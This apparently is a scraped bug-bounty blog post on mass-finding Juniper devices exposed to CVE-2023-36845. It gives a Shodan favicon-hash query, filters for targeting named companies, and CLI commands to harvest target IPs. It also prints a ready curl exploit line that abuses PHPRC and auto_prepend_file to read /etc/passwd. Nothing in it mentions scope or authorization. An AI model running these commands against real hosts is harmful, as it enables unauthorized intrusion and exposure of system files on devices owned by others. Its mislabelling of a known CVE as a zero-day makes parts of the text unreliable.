.png)
10 months ago
75 BOOK THIS SPACE FOR AD
ARTICLE AD
Good Evening Hunters, Today, I will show you how I can easily report many critical bugs on Hackerone, Bugcrowd, and external programs. My journey began with read of a critical vulnerability in Juniper Networks systems, marked by CVE-2023–36845, along with several other CVEs. Here’s a breakdown of the process:
In this article, you’ll learn practical strategies for identifying and exploiting zero-day vulnerabilities as well as harnessing automation to streamline your bug-hunting process.
How to Search for Zero-Day Bugs?
The first step is understanding how to exploit the bug. Familiarize yourself with the CVE and gather more information about the vulnerability. And for this adventure, I brought along my buddy, Shodan.
In my case i can seach for Juniper cve by Juniper favicon hash so it’s easy way:
http.favicon.hash:2141724739Now we have a large number of users affected by this bug. Downloading and manually testing all of them wouldn’t be efficient. It takes a long time to filter which ones have bug bounty programs. Instead, I use several filters to narrow down the list.
I filter by country to focus on specific regions.I use an SSL filter to check for specific domains.Most importantly, I filter by organization. This allows me to target companies like AT&T, Comcast, or others with known bug bounty programs.”Using Shodan CLI to download relevant data into a file
# To Download data in file: Juniper.json.gzshodan download Juniper 'http.favicon.hash:2141724739 org:"AT&T Services Inc."'
# Extract file and output only ip with port
shodan parse Juniper.json.gz --fields ip_str,port --separator " " | awk '{print $1":"$2}' | anew Juniper_ips
Now what? ohh EXPLOIT!!!
Exploiting the Remote Code Execution (RCE) vulnerability. In this case, the CURL command
curl -kv "https://<target>/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'Now every thing is okay, but i need more fun!
Bengali (Bangladesh) · 
English (United States) ·